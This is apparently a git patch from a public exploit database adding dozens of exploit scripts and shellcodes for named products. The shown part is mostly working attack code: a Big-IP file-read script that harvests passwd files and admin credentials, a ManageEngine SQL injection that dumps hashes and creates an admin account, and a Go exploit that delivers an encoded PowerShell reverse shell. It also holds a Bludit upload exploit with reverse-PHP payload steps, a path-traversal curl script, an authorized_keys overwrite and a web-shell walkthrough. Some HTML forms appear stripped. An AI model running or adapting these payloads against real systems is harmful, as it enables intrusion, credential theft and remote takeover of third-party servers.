From e46d9f65ff00b5da8af2bf715f59767ae265523c Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Mon, 27 Jul 2020 05:02:04 +0000 Subject: [PATCH] DB: 2020-07-27 32 changes to exploits/shellcodes Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite) Nidesoft DVD Ripper 5.2.18 - Local Buffer Overflow (SEH) Frigate Professional 3.36.0.9 - 'Pack File' Buffer Overflow (SEH Egghunter) DiskBoss 7.7.14 - 'Reports and Data Directory' Buffer Overflow (SEH Egghunter) Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter) Port Forwarding Wizard 4.8.0 - Buffer Overflow (SEH) Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter) docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter) GOautodial 4.0 - Persistent Cross-Site Scripting (Authenticated) ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection INNEO Startup TOOLS 2018 M040 13.0.70.3804 - Remote Code Execution UBICOD Medivision Digital Signage 1.5.1 - Cross-Site Request Forgery (Add Admin) WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated) Bludit 3.9.2 - Directory Traversal LibreHealth 2.0.0 - Authenticated Remote Code Execution Online Course Registration 1.0 - Unauthenticated Remote Code Execution elaniin CMS - Authentication Bypass Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated) PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting Bio Star 2.8.2 - Local File Inclusion Webtareas 2.1p - Arbitrary File Upload (Authenticated) F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication) Socket.io-file 2.0.31 - Arbitrary File Upload pfSense 2.4.4-p3 - Cross-Site Request Forgery Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting Rails 5.0.1 - Remote Code Execution Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes) Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes) Windows/x86 - Download using mshta.exe Shellcode (100 bytes) --- exploits/hardware/webapps/48694.txt | 62 ++++++ exploits/hardware/webapps/48711.py | 128 +++++++++++++ exploits/java/webapps/48692.py | 95 ++++++++++ exploits/multiple/webapps/48693.go | 281 ++++++++++++++++++++++++++++ exploits/multiple/webapps/48701.txt | 132 +++++++++++++ exploits/multiple/webapps/48708.txt | 35 ++++ exploits/multiple/webapps/48712.txt | 30 +++ exploits/multiple/webapps/48713.txt | 59 ++++++ exploits/php/webapps/48636.txt | 18 +- exploits/php/webapps/48690.txt | 16 ++ exploits/php/webapps/48698.txt | 40 ++++ exploits/php/webapps/48699.sh | 127 +++++++++++++ exploits/php/webapps/48702.txt | 130 +++++++++++++ exploits/php/webapps/48704.py | 113 +++++++++++ exploits/php/webapps/48705.txt | 29 +++ exploits/php/webapps/48706.txt | 76 ++++++++ exploits/php/webapps/48707.txt | 118 ++++++++++++ exploits/php/webapps/48709.txt | 51 +++++ exploits/php/webapps/48714.txt | 40 ++++ exploits/php/webapps/48715.txt | 40 ++++ exploits/ruby/webapps/48716.rb | 32 ++++ exploits/windows/dos/48697.py | 33 ++++ exploits/windows/local/48687.py | 66 +++++++ exploits/windows/local/48688.py | 98 ++++++++++ exploits/windows/local/48689.py | 100 ++++++++++ exploits/windows/local/48691.py | 102 ++++++++++ exploits/windows/local/48695.py | 75 ++++++++ exploits/windows/local/48696.py | 62 ++++++ exploits/windows/local/48719.py | 99 ++++++++++ files_exploits.csv | 28 +++ files_shellcodes.csv | 3 + shellcodes/linux_x86/48592.c | 79 ++++++++ shellcodes/linux_x86/48703.c | 75 ++++++++ shellcodes/windows_x86/48718.c | 69 +++++++ 34 files changed, 2532 insertions(+), 9 deletions(-) create mode 100644 exploits/hardware/webapps/48694.txt create mode 100755 exploits/hardware/webapps/48711.py create mode 100755 exploits/java/webapps/48692.py create mode 100755 exploits/multiple/webapps/48693.go create mode 100644 exploits/multiple/webapps/48701.txt create mode 100644 exploits/multiple/webapps/48708.txt create mode 100644 exploits/multiple/webapps/48712.txt create mode 100644 exploits/multiple/webapps/48713.txt create mode 100644 exploits/php/webapps/48690.txt create mode 100644 exploits/php/webapps/48698.txt create mode 100755 exploits/php/webapps/48699.sh create mode 100644 exploits/php/webapps/48702.txt create mode 100755 exploits/php/webapps/48704.py create mode 100644 exploits/php/webapps/48705.txt create mode 100644 exploits/php/webapps/48706.txt create mode 100644 exploits/php/webapps/48707.txt create mode 100644 exploits/php/webapps/48709.txt create mode 100644 exploits/php/webapps/48714.txt create mode 100644 exploits/php/webapps/48715.txt create mode 100755 exploits/ruby/webapps/48716.rb create mode 100755 exploits/windows/dos/48697.py create mode 100755 exploits/windows/local/48687.py create mode 100755 exploits/windows/local/48688.py create mode 100755 exploits/windows/local/48689.py create mode 100755 exploits/windows/local/48691.py create mode 100755 exploits/windows/local/48695.py create mode 100755 exploits/windows/local/48696.py create mode 100755 exploits/windows/local/48719.py create mode 100644 shellcodes/linux_x86/48592.c create mode 100644 shellcodes/linux_x86/48703.c create mode 100644 shellcodes/windows_x86/48718.c diff --git a/exploits/hardware/webapps/48694.txt b/exploits/hardware/webapps/48694.txt new file mode 100644 index 000000000..268a0eb4e --- /dev/null +++ b/exploits/hardware/webapps/48694.txt @@ -0,0 +1,62 @@ +# Title: UBICOD Medivision Digital Signage 1.5.1 - Cross-Site Request Forgery (Add Admin) +# Date: 2020-07-23 +# Author: LiquidWorm +# Product web page: http://www.medivision.co.kr +# CVE: N/A + + + + + + +
+ + + + + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/48711.py b/exploits/hardware/webapps/48711.py new file mode 100755 index 000000000..3a34138b1 --- /dev/null +++ b/exploits/hardware/webapps/48711.py @@ -0,0 +1,128 @@ +# Exploit Title: F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion +# Date: 2019-08-17 +# Exploit Author: Carlos E. Vieira +# Vendor Homepage: https://www.f5.com/products/big-ip-services +# Version: <= 13.1.3 +# Tested on: BIG-IP 13.1.3 Build 0.0.6 +# CVE : CVE-2020-5902 + +#!/usr/bin/env python + +import requests +import sys +import time +import urllib3 +import json +urllib3.disable_warnings() + +global target + +def checkTarget(): + + r = requests.head(target + "/tmui/login.jsp", verify=False) + if(r.status_code == 200): + return True + else: + return False + +def checkVuln(): + + r = requests.get(target + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd", verify=False) + if(r.status_code == 200): + + data = json.loads(r.text) + if(len(data['output']) > 0): + return True + else: + return False + + else: + return False + +def leakPasswd(): + print("[+] Leaking /etc/passwd from server") + time.sleep(2) + exploit('/etc/passwd') + + +def leakHosts(): + print("[+] Leaking /etc/hosts from server") + time.sleep(2) + exploit('/etc/hosts') + +def leakLicence(): + + print("[+] Leaking /config/bigip.license from server") + time.sleep(2) + exploit('/config/bigip.license') + +def leakAdmin(): + + print("[+] Leaking admin credentials from server") + time.sleep(2) + r = requests.get(target + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin", verify=False) + if(r.status_code == 200): + + data = json.loads(r.text) + if(len(data['output']) > 0 ): + print(data['output']) + else: + print("[X] Admin credentials not found") + else: + print("[X] Fail to read file") + + +def exploit(file): + + r = requests.get(target + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=" + file, verify=False) + if(r.status_code == 200): + data = json.loads(r.text) + print(data['output']) + else: + print("[X] Fail to read file") + +def memoryLeak(): + print("[!] Leaking tomcat process from server") + time.sleep(2) + r = requests.get(target + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/self/cmdline", verify=False) + if(r.status_code == 200): + data = json.loads(r.text) + if(len(data['output'])>0): + print("Command: " + data['output']) + +def main(host): + + print("[+] Check target...") + global target + target = "https://" + host + + check = checkTarget() + if(check): + print("[~] Target is available") + + vuln = checkVuln() + if(vuln): + print("[+] Target is vulnerable!") + + time.sleep(1) + print("[~] Leak information from target!") + time.sleep(1) + leakPasswd() + leakHosts() + leakLicence() + leakAdmin() + memoryLeak() + else: + print("[X] Target is't vulnerable") + + else: + print("[x] Target is unavailable") + + +if __name__ == "__main__": + + if(len(sys.argv) < 2): + print("Use: python {} ip/dns".format(sys.argv[0])) + else: + host = sys.argv[1] + main(host) \ No newline at end of file diff --git a/exploits/java/webapps/48692.py b/exploits/java/webapps/48692.py new file mode 100755 index 000000000..500ec8575 --- /dev/null +++ b/exploits/java/webapps/48692.py @@ -0,0 +1,95 @@ +# Exploit Title: ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection +# Google Dork: intitle:"Applications Manager Login Screen" +# Date: 2020-07-23 +# Exploit Author: aldorm +# Vendor Homepage: https://www.manageengine.com/ +# Software Link: +# Version: 12 and 13 before Build 13200 +# Tested on: Windows +# CVE : 2016-9488 + +#!/usr/bin/env python2 + +# App: ManageEngine Applications Manager +# Versions: 12 and 13 before build 13200 +# CVE: CVE-2016-9488 +# Vuln Type: SQL Injection +# CVSSv3: 9.8 +# +# PoC Autor: aldorm +# Release date: 23-07-2020 + +# ./poc_CVE-2016-9488.py 192.168.123.113 8443 --create-user-hacker +# [*] Extracting all users: +# admin:21232f297a57a5a743894a0e4a801fc3 +# reportadmin:21232f297a57a5a743894a0e4a801fc3 +# systemadmin_enterprise:21232f297a57a5a743894a0e4a801fc3 +# [*] Creating new user: +# User: hacker +# Password: admin +# [*] Verifing created user... +# Success. + + +import sys +import requests +import urllib3 +import json + + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +target = 'localhost' + +def get_userpassword(): + sqli = ' UNION ALL SELECT userid,CONCAT(username,$$:$$,password),NULL FROM am_userpasswordtable--' + r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False); + j = json.loads(r.text) + return j + +def create_user(): + sqli = '; INSERT INTO am_userpasswordtable VALUES (123123123, $$hacker$$,$$21232f297a57a5a743894a0e4a801fc3$$,NULL,NULL,$$21232f297a57a5a743894a0e4a801fc3$$,1); -- ' + r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False); + + sqli = ';INSERT INTO amdb.public.am_usergrouptable VALUES ($$hacker$$,$$USERS$$); -- ' + r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False); + + sqli = ';INSERT INTO amdb.public.am_usergrouptable VALUES ($$hacker$$,$$ADMIN$$); -- ' + r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False); + + return + + +def main (): + if not len(sys.argv) > 2: + print "Usage %s [--create-user-hacker]" % sys.argv[0] + print "e.g. %s manageengine 8443 " % sys.argv[0] + sys.exit(1) + + global target + global port + target=sys.argv[1] + port=sys.argv[2] + + print "[*] Extracting all users:" + j = get_userpassword() + for user in j["0"]: + print "\t %s" % user[1] + + + if len(sys.argv) == 4 and sys.argv[3] == '--create-user-hacker': + print "[*] Creating new user: \n\tUser: hacker \n\tPassword: admin" + create_user() + print "[*] Verifing created user..." + + j = get_userpassword() + for user in j["0"]: + if user[1] == "hacker:21232f297a57a5a743894a0e4a801fc3": + print "Success." + return + print "User not created." + + + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/48693.go b/exploits/multiple/webapps/48693.go new file mode 100755 index 000000000..523ea733e --- /dev/null +++ b/exploits/multiple/webapps/48693.go @@ -0,0 +1,281 @@ +# Exploit Title: INNEO Startup TOOLS 2018 M040 13.0.70.3804 - Remote Code Execution +# Date: 2020-07-23 +# Exploit Author: Patrick Hener, SySS GmbH +# Many credits go to Dr. Benjamin Heß, SySS GmbH for helping with php oddities and the powershell payload +# Advisory: SYSS-2020-028 (https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-028.txt) +# Vendor Homepage: https://www.inneo.co.uk/en/home.html +# Version: Startup TOOLS 2017/2018 +# Tested on: Windows 10 x64 +# CVE : CVE-2020-15492 + +/* This exploit was written by Patrick Hener, SySS GmbH +*/ + +package main + +import ( + "encoding/base64" + "fmt" + _ "fmt" + "io" + "io/ioutil" + "log" + "net" + "net/http" + "net/url" + "os" + "regexp" + "strconv" + "strings" + + "golang.org/x/text/encoding/unicode" +) + +type progress struct { + bytes uint64 +} + +func usage() { + fmt.Printf("Usage: %s lhost[192.168.x.x] lport[4444] url[http://ip:85] installDir[PROGRA~2/stools] \n\n", os.Args[0]) + os.Exit(2) +} + +func readFile(target string, traversal string, path string) (bool, string) { + success := true + request := fmt.Sprintf("%s%s%s", target, traversal, path) + resp, err := http.Get(request) + if err != nil { + fmt.Println(err) + } + if resp.Status != "200 OK" { + success = false + } + + defer resp.Body.Close() + body, err := ioutil.ReadAll(resp.Body) + if err != nil { + fmt.Println(err) + } + + return success, string(body) +} + +func triggerFile(target string, traversal string, path string) { + request := fmt.Sprintf("%s%s%s", target, traversal, path) + _, _ = http.Get(request) +} + +func poison(target string, traversal string, path string) (bool, string) { + success := true + request := fmt.Sprintf("%s%s%s", target, traversal, path) + resp, err := http.Get(request) + if err != nil { + fmt.Println(err) + os.Exit(2) + } + if resp.Status != "404 Not Found" { + success = false + } + + defer resp.Body.Close() + + fmt.Printf("[*] Poisoned: %s\n", path) + + body, err := ioutil.ReadAll(resp.Body) + if err != nil { + fmt.Println(err) + } + + return success, string(body) +} + +func parseHostname(body string) string { + re := regexp.MustCompile("Service hostname:?.*") + hostnameRaw := re.FindAllString(body, -1) + hostnameSplit := strings.Split(hostnameRaw[0], ":") + hostnameTrimmed := strings.TrimSpace(hostnameSplit[1]) + hostnameNoNewline := strings.Replace(hostnameTrimmed, "\n", "", -1) + + return hostnameNoNewline +} + +func customEscape(sequence string) string { + output := url.PathEscape(sequence) + output = strings.Replace(output, "+", "%20", -1) + output = strings.Replace(output, "=", "%3D", -1) + + return output +} + +func payloadEscape(sequence string) string { + output := url.PathEscape(sequence) + output = strings.Replace(output, "=", "%3D", -1) + + return output +} + +func transferStreams(con net.Conn) { + c := make(chan progress) + + // Read from Reader and write to Writer until EOF + copy := func(r io.ReadCloser, w io.WriteCloser) { + defer func() { + r.Close() + w.Close() + }() + n, err := io.Copy(w, r) + if err != nil { + fmt.Printf("[%s]: ERROR: %s\n", con.RemoteAddr(), err) + } + c <- progress{bytes: uint64(n)} + } + + go copy(con, os.Stdout) + go copy(os.Stdin, con) + + p := <-c + fmt.Printf("[*] [%s]: Connection has been closed by remote peer, %d bytes has been received\n", con.RemoteAddr(), p.bytes) + p = <-c + fmt.Printf("[*] [%s]: Local peer has been stopped, %d bytes has been sent\n", con.RemoteAddr(), p.bytes) +} + +func startServer(addr string) { + ln, err := net.Listen("tcp", addr) + if err != nil { + log.Fatalln(err) + } + fmt.Printf("[+] Now listening on %s\n", addr) + con, err := ln.Accept() + if err != nil { + log.Fatalln(err) + } + fmt.Printf("[+] [%s]: Connection has been opened. Press 'RETURN' once to start. Enjoy your shell, good sir.\n", con.RemoteAddr()) + transferStreams(con) +} + +func stage1(target string, traversal string, installDir string) string { + fmt.Printf("[*] Attacking target %s with assumed install path %s\n", target, installDir) + fmt.Printf("[*] Trying to read 'sut_server.log' to receive hostname of target at %s%s%s/software/LOG/sut_server.log\n", target, traversal, installDir) + path := fmt.Sprintf("%s/software/LOG/sut_server.log", installDir) + success, response := readFile(target, traversal, path) + if !success { + fmt.Printf("[-] It looks like %s%s%s is not there. Provide install_dir to try via args.\n", target, traversal, installDir) + os.Exit(2) + } + hostname := parseHostname(response) + + return hostname +} + +func stage2(target string, traversal string, installDir string, payloadFinal string) { + /* Stage 2 - poison log with php payload + Special about that is the length of payload junk has max restriction of about 200 characters + Thus we are splitting up the payload escaping the trash we don't need like + the 'n' is nesessary to escape DRIVE:\ which will be DRIVE:\n then + + */ + fmt.Println("[*] Poisoning Log with payload") + /* Start of the php code */ + start := customEscape("") + success, _ = poison(target, traversal, end) + if !success { + fmt.Println("Poisoning failed. Exiting") + os.Exit(2) + } +} + +func stage3(target string, traversal string, installDir string, hostname string) { + logFile := fmt.Sprintf("%s%s%s/software/LOG/sut_server_%s.log\\0.php", target, traversal, installDir, hostname) + fmt.Printf("[*] Triggering inclusion of %s\n", logFile) + triggerFile(target, traversal, logFile) +} + +func stage4(lhost string, lport int) { + /* Listen for socket connection */ + addr := fmt.Sprintf("%s:%d", lhost, lport) + fmt.Printf("[*] Starting reverse listener at %s\n", addr) + startServer(addr) +} + +func main() { + if len(os.Args) < 4 { + usage() + } + + lhost := os.Args[1] + lport, err := strconv.Atoi(os.Args[2]) + if err != nil { + fmt.Println("lport has to be numeric") + os.Exit(2) + } + target := os.Args[3] + var installDir string + if len(os.Args) == 4 { + installDir = "PROGRA~2/stools" + } else { + installDir = os.Args[4] + } + + /* Payload definition */ + payload := fmt.Sprintf("$client = New-Object System.Net.Sockets.TCPClient('%s',%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()", lhost, lport) + /* Convert to base64 UTF-16LE */ + encoder := unicode.UTF16(unicode.LittleEndian, unicode.IgnoreBOM).NewEncoder() + payloadEncoded, _ := encoder.String(payload) + payloadEncodedString := base64.StdEncoding.EncodeToString([]byte(payloadEncoded)) + /* In webshell we would issue: powershell.exe -exec bypass -EncodedCommand */ + payloadFinal := fmt.Sprintf("powershell.exe -exec bypass -EncodedCommand %s", payloadEncodedString) + + /* Traversal to root - default depth would be 4 */ + traversal := "/../../../../../../../../../../" + + /* stage 1 - get hostname */ + hostname := stage1(target, traversal, installDir) + fmt.Printf("[+] Hostname of target is: %s\n", hostname) + /* stage 2 - poisoning */ + stage2(target, traversal, installDir, payloadFinal) + /* stage 3 - trigger */ + go stage3(target, traversal, installDir, hostname) + /* stage4 - start listener */ + stage4(lhost, lport) +} \ No newline at end of file diff --git a/exploits/multiple/webapps/48701.txt b/exploits/multiple/webapps/48701.txt new file mode 100644 index 000000000..fd1db8862 --- /dev/null +++ b/exploits/multiple/webapps/48701.txt @@ -0,0 +1,132 @@ +# Title: Bludit 3.9.2 - Directory Traversal +# Author: James Green +# Date: 2020-07-20 +# Vendor Homepage: https://www.bludit.com +# Software Link: https://github.com/bludit/bludit +# Version: 3.9.2 +# Tested on: Linux Ubuntu 19.10 Eoan +# CVE: CVE-2019-16113 +# +# Special Thanks to Ali Faraj (@InfoSecAli) and authors of MSF Module https://www.exploit-db.com/exploits/47699 + +#### USAGE #### +# 1. Create payloads: .png with PHP payload and the .htaccess to treat .pngs like PHP +# 2. Change hardcoded values: URL is your target webapp, username and password is admin creds to get to the admin dir +# 3. Run the exploit +# 4. Start a listener to match your payload: `nc -nlvp 53`, meterpreter multi handler, etc +# 5. Visit your target web app and open the evil picture: visit url + /bl-content/tmp/temp/evil.png + +#!/usr/bin/env python3 + +import requests +import re +import argparse +import random +import string +import base64 +from requests.exceptions import Timeout + +url = 'http://127.0.0.1' # CHANGE ME +username = 'James' # CHANGE ME +password = 'Summer2020' # CHANGE ME + +# msfvenom -p php/reverse_php LHOST=127.0.0.1 LPORT=53 -f raw -b '"' > evil.png +# echo -e " evil.png +payload = 'evil.png' # CREATE ME + +# echo "RewriteEngine off" > .htaccess +# echo "AddType application/x-httpd-php .png" >> .htaccess +payload2 = '.htaccess' # CREATE ME + +def login(url,username,password): + """ Log in with provided admin creds, grab the cookie once authenticated """ + + session = requests.Session() + login_page = session.get(url + "/admin/") + csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', + login_page.text + ).group(1) + cookie = ((login_page.headers["Set-Cookie"]).split(";")[0].split("=")[1]) + data = {"save":"", + "password":password, + "tokenCSRF":csrf_token, + "username":username} + headers = {"Origin":url, + "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", + "Upgrade-Insecure-Requests":"1", + "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0", + "Connection":"close", + "Referer": url + "/admin/", + "Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3", + "Accept-Encoding":"gzip, deflate", + "Content-Type":"application/x-www-form-urlencoded" + } + cookies = {"BLUDIT-KEY":cookie} + response = session.post(url + "/admin/", + data=data, + headers=headers, + cookies=cookies, + allow_redirects = False + ) + + print("cookie: " + cookie) + return cookie + +def get_csrf_token(url,cookie): + """ Grab the CSRF token from an authed session """ + + session = requests.Session() + headers = {"Origin":url, + "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", + "Upgrade-Insecure-Requests":"1", + "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0", + "Connection":"close", + "Referer":url + "/admin/", + "Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3", + "Accept-Encoding":"gzip, deflate"} + cookies = {"BLUDIT-KEY":cookie} + response = session.get(url + "/admin/dashboard", + headers=headers, + cookies=cookies + ) + csrf_token = response.text.split('var tokenCSRF = "')[1].split('"')[0] + + print("csrf_token: " + csrf_token) + return csrf_token + +def upload_evil_image(url, cookie, csrf_token, payload, override_uuid=False): + """ Upload files required for to execute PHP from malicious image files. Payload and .htaccess """ + + session = requests.Session() + files= {"images[]": (payload, + open(payload, "rb"), + "multipart/form-data", + {"Content-Type": "image/png", "filename":payload} + )} + if override_uuid: + data = {"uuid": "../../tmp/temp", + "tokenCSRF":csrf_token} + else: + # On the vuln app, this line occurs first: + # Filesystem::mv($_FILES['images']['tmp_name'][$uuid], PATH_TMP.$filename); + # Even though there is a file extension check, it won't really stop us + # from uploading the .htaccess file. + data = {"tokenCSRF":csrf_token} + headers = {"Origin":url, + "Accept":"*/*", + "X-Requested-With":"XMLHttpRequest", + "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0", + "Connection":"close", + "Referer":url + "/admin/new-content", + "Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3", + "Accept-Encoding":"gzip, deflate", + } + cookies = {"BLUDIT-KEY":cookie} + response = session.post(url + "/admin/ajax/upload-images", data=data, files=files, headers=headers, cookies=cookies) + print("Uploading payload: " + payload) + +if __name__ == "__main__": + cookie = login(url, username, password) + token = get_csrf_token(url, cookie) + upload_evil_image(url, cookie, token, payload, True) + upload_evil_image(url, cookie, token, payload2) \ No newline at end of file diff --git a/exploits/multiple/webapps/48708.txt b/exploits/multiple/webapps/48708.txt new file mode 100644 index 000000000..27d0aa4a3 --- /dev/null +++ b/exploits/multiple/webapps/48708.txt @@ -0,0 +1,35 @@ +# Exploit Title: Bio Star 2.8.2 - Local File Inclusion +# Authors: SITE Team (Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi) +# Google Dork: N/A +# Date of Exploit Release: 2020-07-13 +# Exploit Author: SITE Team +# Vendor Homepage: https://www.supremainc.com/en/main.asp +# Software Link: https://www.supremainc.com/en/support/biostar-2-pakage.asp +# Version: Bio Star 2, Video Extension up to version 2.8.2 +# Tested on: Windows +# CVE : CVE-2020-15050 + + +#!/bin/bash + +# Exploit Title: Video Extension of Bio Star up to 2.8.1 Local File Inclusion Exploit +# Authors: SITE Team (Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi) +# Google Dork: N/A +# Date of Exploit Release: 13/7/2020 +# Exploit Author: SITE Team +# Vendor Homepage: https://www.supremainc.com/en/main.asp +# Software Link: https://www.supremainc.com/en/support/biostar-2-pakage.asp +# Version: Bio Star 2, Video Extension up to version 2.8.1 +# Tested on: Windows +# CVE : CVE-2020-15050 + +echo "*********** SITE TEAM *********************" +echo "*********** Video Extension of Bio Star 2 Local File Inclusion Exploit ***********" +echo "*********** Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi *********************" + + if [ -z "$*" ]; then echo "Usage Example: ./exploit.sh https://website/ ../../../../../../../../../../../../windows/win.ini" +echo "*******************************************" +else +args=("$@") +curl -X GET --path-as-is -k ${args[0]}${args[1]} +fi \ No newline at end of file diff --git a/exploits/multiple/webapps/48712.txt b/exploits/multiple/webapps/48712.txt new file mode 100644 index 000000000..3ad3f4e44 --- /dev/null +++ b/exploits/multiple/webapps/48712.txt @@ -0,0 +1,30 @@ +# Exploit Title: Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication) +# Google Dork: https://www.shodan.io/search?query=sickbeard +# Date: 2020-06-06 +# Exploit Author: bdrake +# Vendor Homepage: https://sickbeard.com/ +# Software Link: https://github.com/midgetspy/Sick-Beard +# Version: alpha (master) -- git : 31ceaf1b5cab1884a280fe3f4609bdc3b1fb3121 +# Tested on: Fedora 32 +# CVE : NA + + + + +
+ + + + + + + +
+ + + \ No newline at end of file diff --git a/exploits/multiple/webapps/48713.txt b/exploits/multiple/webapps/48713.txt new file mode 100644 index 000000000..d0b98b609 --- /dev/null +++ b/exploits/multiple/webapps/48713.txt @@ -0,0 +1,59 @@ +# Exploit Title: Socket.io-file 2.0.31 - Arbitrary File Upload +# Date: 2020-07-02 +# Exploit Author: Cr0wTom +# Vendor Homepage: https://www.npmjs.com/package/socket.io-file +# Software Link: https://www.npmjs.com/package/socket.io-file/v/2.0.31 +# Version: <= v2.0.31 +# Tested on: node v10.19.0, Socket.io-file v2.0.31, socket.io v2.3.0 +# CVE: - + +# Requirements: pip install socketIO-client-nexus==0.7.6 + +#!/usr/bin/env python + +import sys +import json +import os +from socketIO_client_nexus import SocketIO, LoggingNamespace + +def file_creation(RHOST, RPORT): + print ('Initiating connection...') + with SocketIO(RHOST, RPORT, LoggingNamespace) as socketIO: + + print ('Creating file...') + + # Example server running in /home/testuser/Documents/socket-app so customize the path appropriately + # Change the "name" option if you want to create an other file in an different path of the system + socketIO.emit("socket.io-file::createFile",{"id":"u_0","name":"../client/index.html","size":1,"chunkSize":10240,"sent":0,"data":{}}) + + # Example for server running with root access: + # socketIO.emit("socket.io-file::createFile",{"id":"u_0","name":"../../../../../root/.ssh/authorized_keys","size":1,"chunkSize":10240,"sent":0,"data":{}}) + + print ('Writing data to file...') + + # Add the data you want to get written to the file + data = "Exploited by Cr0wTom" + json_string = json.dumps(data) + socketIO.once("socket.io-file::request::u_0", on_aaa_response) + socketIO.emit("socket.io-file::stream::u_0", json_string) + +def on_aaa_response(*args): + print('on_aaa_response', args) + +def print_usage(): + print ('Socket.io-file <= 2.0.31 - Improper Input Validation in File Upload Functionality') + print ('Exploit Author: Cr0wTom (https://cr0wsplace.com)\n') + print ('Usage: python3 exploit.py ') + print ('RHOST The target host IP address or domain.') + print ('RPORT The target host port number of the nodejs server.') + +if __name__ == '__main__': + + # ensure we have at least an IP and Port + if len(sys.argv) < 3: + print_usage() + sys.exit(1) + + print ('Socket.io-file <= 2.0.31 - Improper Input Validation in File Upload Functionality') + print ('Exploit Author: Cr0wTom (https://cr0wsplace.com)\n') + file_creation(sys.argv[1], sys.argv[2]) \ No newline at end of file diff --git a/exploits/php/webapps/48636.txt b/exploits/php/webapps/48636.txt index 8dd2f6607..35326f319 100644 --- a/exploits/php/webapps/48636.txt +++ b/exploits/php/webapps/48636.txt @@ -7,18 +7,17 @@ 1- Go to following url. >> http://(HOST)/cms/ 2- Default username and password is admin:admin. We must know login credentials. -3- Go "Filemanager" and press "Upload file" button. -4- Choose your php webshell script and upload it. - -((Example PHP Web Shell Code)) -"; system($_GET['cmd']); ?> +3- Go to "Filemanager" and press "Upload file" button. +4- Choose your php web shell script and upload it. + +PHP Web Shell Code == 5- You can find uploaded file there. >> http://(HOST)/media/(FILE-NAME).php -6- We can execute a command now. >> http://(HOST)/media/(FILE-NAME).php?cmd=whoami +6- We can execute a command now. >> http://(HOST)/media/(FILE-NAME).php?cmd=id (( REQUEST )) -GET /ritecms/media/webshell.php?cmd=whoami HTTP/1.1 +GET /media/(FILE-NAME).php?cmd=id HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 @@ -29,12 +28,13 @@ Connection: close Cookie: icms[device_type]=desktop; icms[guest_date_log]=1593777486; PHPSESSID=mhuunvasd12cveo52fll3u Upgrade-Insecure-Requests: 1 + (( RESPONSE )) HTTP/1.1 200 OK -Date: Fri, 03 Jul 2020 21:10:13 GMT +Date: Fri, 06 Jul 2020 20:02:13 GMT Server: Apache/2.4.43 (Debian) Content-Length: 14 Connection: close Content-Type: text/html; charset=UTF-8 -
www-data
\ No newline at end of file
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
\ No newline at end of file
diff --git a/exploits/php/webapps/48690.txt b/exploits/php/webapps/48690.txt
new file mode 100644
index 000000000..03e214462
--- /dev/null
+++ b/exploits/php/webapps/48690.txt
@@ -0,0 +1,16 @@
